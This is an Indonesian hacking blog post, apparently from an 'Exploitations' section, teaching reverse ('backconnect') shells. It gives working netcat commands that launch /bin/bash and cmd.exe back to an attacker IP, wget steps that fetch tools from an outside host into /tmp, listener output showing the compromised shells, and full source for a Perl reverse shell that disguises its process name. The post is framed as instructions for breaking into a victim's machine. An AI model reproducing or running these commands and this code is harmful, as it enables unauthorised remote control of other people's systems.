75n1.com

close
close

Follow by Email

Connect Back Shell



Connect Back Shell atau lebih akrab disebut Backconnect adalah melakukan remote dari komputer sasaran ke komputer kita. Kalau tadi bindshell adalah remote dari komputer kita ke komputer sasaran, kalau backconnect di balik, dari komputer sasaran ke komputer kita.

Backconnect adalah sebuah alternatif bila bindshell gagal, ntah karena gak punya akses, denied akses, sekurity dari firewall, atau karena komputer sasaran tertutup oleh proxy server (komputer sasaran berada di dalam network yang tertutup oleh proxy). Bila ada proxy di depan komputer sasaran, walau bind berhasil, namun kita tetap tidak bisa melakukan remote konek ke sasaran karena tertutup komputern proxy.

[img=https://web.archive.org/web/20101028020104im_/http://Target/files/post/20106160630_close.JPG]' />

Ketika kita melakukan koneksi, maka koneksi kita akan di tolak karena port yg kita tuju tidak terbuka di firewall. Firewall menolak semua koneksi/request ke port yang tidak dibuka di firewall tersebut. Paket-paket berisi request yang di kirim oleh attacker tidak bisa melewati dinding firewall karena memang jalur tidak terbuka, sehingga request koneksi tidak pernah sampai di komputer sasaran.

D:\HACK>nc -vv 192.168.10.10 1968
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 1968 (?): connection refused
sent 0, rcvd 0: NOTSOCK


Kasus lain, adalah bila komputer sasaran berada di dalam internal network, yang mana network tersebut tertutup oleh proxy server. Dalam hal ini, proxy server bertindak sebagai gateway network yang ada di dalamnya.

Ketika attacker berhasil binding port di komputer sasaran yang ada di dalam proxy, attacker tetap tidak bisa melakukan remote connection karena port tidak terbuka di komputer proxy. Proxy mengatur lalu lintas data dari port-port yang di seting di proxy untuk di teruskan ke ip dan port yang ada di internal network nya. Ketika attacker binding port di komputer yang di dalam proxy, di proxy tidak pernah di set port yg mengarahkan service ke komputer sasaran melalui port yang di bind. Sehinga proxy akan menolak koneksi ke port yang di minta attacker, karena proxy memang tidak pernah mengenali service pada port yg di minta attacker.

[img=https://web.archive.org/web/20101028020104im_/http://Target/files/post/20106160630_close.JPG]' />

Percobaan koneksi yang akan kita terima adalah seperti berikut :

D:\HACK>nc -vv 192.168.10.10 1968
Warning: lookup failed for 192.168.10.10: h_errno 11004: NO_DATA
[192.168.10.10] 1968 (?): connection refused
sent 0, rcvd 0: NOTSOCK

Refushed!!!

But no mission are impossible

Bagaimana kita mendapatkan koneksi ke komputer sasaran sementara di depan komputer sasaran ada bodyguard yang selalu memukul dan meluluh-lantak-kan setiap koneksi yang di minta dari luar yang tidak di kenal? Inilah dia. BackConnect.

Seperti yang saya katakan. Backconnect adalah membalikkan koneksi dari komputer sasaran ke komputer attacker yang telah listening pada port tertentu, dengan membawa/meluncurkan aplikasi tertentu, dalam hal ini (hacking) yang akan kita luncurkan (diluncurkan dari sasaran) adalah /bin/bash.

Sehingga ketika komputer sasaran melakukan koneksi ke komputer attacker, komputer attacker akan menerima koneksi, dan akan membuka dan mengaktifkan aplikasi yang di luncurkan oleh komputer sasaran, dalam hal ini adalah /bin/bash. Dengan demikian, attacker mendapatkan akses interaktif /bin/bash dari komputer sasaran. It is interactive console.

[img=https://web.archive.org/web/20101028020104im_/http://target/files/post/20106160630_close.JPG]' />

Sippppppppp.
Teknik untuk melakukan backconnect ini hampir sama dengan bindshell. Tool nya pun kita tetep menggunakan netcat. Netcat emang maknyozz!!.

BackConnect dengan NetCat
Untuk bisa melakukan backconnect, maka ip yang kita pakai haruslah ip public, atau ip yang terkoneksi langsung ke internet tanpa penghalang proxy.Cara melakukan backconnect sangat mudah, semudah bindshell. Yang perlu kita lakukan pertama kali adalah set mode listening di komputer kita. Hanya set mode listening, tanpa aplikasi apapun, karena kita akan menerima aplikasi yang diluncurkan oleh kompi sasaran.

[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...


Sip. Kompi kita udah listening. Berikutnya kita koneksikan komputer sasaran ke komputer kita dengan meluncurkan aplikasi /bin/bash. Seperti biasa, harus ada netcat di kompi sasaran. Downloadkan dulu netcat ke kompi sasaran. Simpan di direktory yg writeable. Atau langsung aja ke /tmp.

Command untuk backconnect adalah: nc –vv [ip attacker] [port] –e [launch aplication]

cd /tmp
wget http://hacking.tool/nc
chmod 777 nc
./nc –vv 192.168.10.20 6888 –e /bin/bash


Setelah menjalankan command tersebut di komputer sasaran, sekarang lihatlah komputer kita. Kita sudah mendapatkan koneksi balik dari komputer sasaran dan langsung menerima aplikasi yg diluncurkan oleh komputer sasaran ke komputer kita.

[root@localhost][/root] nc -vlp 6888
listening on [any] 6888 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 43886
id
uid=48(nobody) gid=48(nobody) groups=48(nobody)
uname –a
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86 _64 x86_64 GNU/Linux


Nah, kan. Kita mendapatkan interaktif console melalui teknik backconnect. Selanjutnya, ya terserah kita mau apa. Obok-obok sampe puas pastinya.
Kalau komputer sasaran adalah windows? Sama aja bos. Hanya aplikasi yang diluncurkan adalah cmd.exe

nc –vv 192.168.10.20 6788 –e cmd.exe

Kemudian kita lihat di komputer kita yang tadi sudah kita set listening.

[root@localhost][/root] nc -vlp 6788
listening on [any] 6788 ...
192.168.10.10: inverse host lookup failed: Unknown host
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 59681
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.

C:\Windows> <<< dapat!!! Kita telah mendapatkan cmd.exe di komp sasaran
C:\Windows>ipconfig <<< tes lihat ip
ipconfig

Windows IP Configuration
PPP adapter:
Connection-specific DNS Suffix . :
IP Address. . . . . . . . . . . . : 192.168.10.10
Subnet Mask . . . . . . . . . . . : 255.255.255.255
Default Gateway . . . . . . . . . : 192.168.10.100

D:\Windows>


Nah. Asiiiiiiiiiikkkkkkkkkkkkkkk udah dpt console interaktif. Selanjutnya tinggal command-command sesuka kita.

[b]BackConnect.pl (Backconnect dengan aplikasi perl)[/b]
Nah, ada bindshell.pl ada pula backconnect.pl. fungsinya, jelas untuk melakukan backconnect dengan aplikasi perl. Karena ditulis dengan perl, maka aplikasi ini membutuhkan perl juga di komputer sasaran. Bagaimana ngecek nya kalau user kita bisa jalankan perl? Seperti yang dulu, tetep perl –v. Gak perlu panjang lebar, langsung in action.

Set mode listening di komputer kita.

nc –vlp 9999

Kemudian, kita download backconnect.txt yang sudah kita upload ke hosting kita ke komputer sasaran, di direktory yang writeable tentunya. Seperti biasa pula, langsung menuju /tmp.

Cara pakai backconnectnya: perl backconnect.txt [ip] [port]

cd /tmp
wget http://hacking.tool/backconnect.txt
perl backconnect.txt 192.168.10.20 9999 &


ok. Setelah menjalankan command ini di komputer korban, kembali ke komputer
kita. Dan lihat,kita dapat console sang korban.


[root@localhost][/root] nc -vlp 9999
listening on [any] 9999 ...
connect to [192.168.10.20] from (UNKNOWN) [192.168.10.10] 44808
Linux astra.2014.ws 2.6.18-164.el5 #1 SMP Thu Sep 3 03:28:30 EDT 2009
x86_64 x86_64 x86_64 GNU/Linux
uid=48(nobody) gid=48(nobody) groups=48(nobody)
pwd
/tmp
whoami
apache


Gotchaaaaaaaa!!!!!!! You are in !!!

BackConnect's Code

#!/usr/bin/perl
use Socket;
$cmd= "lynx";
$system= 'echo "`uname -a`";echo "`id`";/bin/sh';
$0=$cmd;
$target=$ARGV[0];
$port=$ARGV[1];
$iaddr=inet_aton($target) || die("Error: $!\n");
$paddr=sockaddr_in($port, $iaddr) || die("Error: $!\n");
$proto=getprotobyname('tcp');
socket(SOCKET, PF_INET, SOCK_STREAM, $proto) || die("Error: $!\n");
connect(SOCKET, $paddr) || die("Error: $!\n");
open(STDIN, ">&SOCKET");
open(STDOUT, ">&SOCKET");
open(STDERR, ">&SOCKET");
system($system);
close(STDIN);
close(STDOUT);
close(STDERR);

Nah, sudah mengerti kan tentang remote connection (interactive console)? Cara melakukanya juga gak sulit. Simple gitu aja. Karena ini sangat penting, jadi pahami dengan baik. Untuk yang punya dua komputer, bisa mencobanya dengan kedua
komputernya. 1 sebagai attacker, 1 nya sebagai komputer korban. Banyak aplikasi untuk melakukan teknik ini. Banyak metode untuk mendapatkan interaktive console, because “Hack Is Art”.



Labels: Exploitations

Thanks for reading Connect Back Shell . Please share...!

0 Comment for "Connect Back Shell "

Back To Top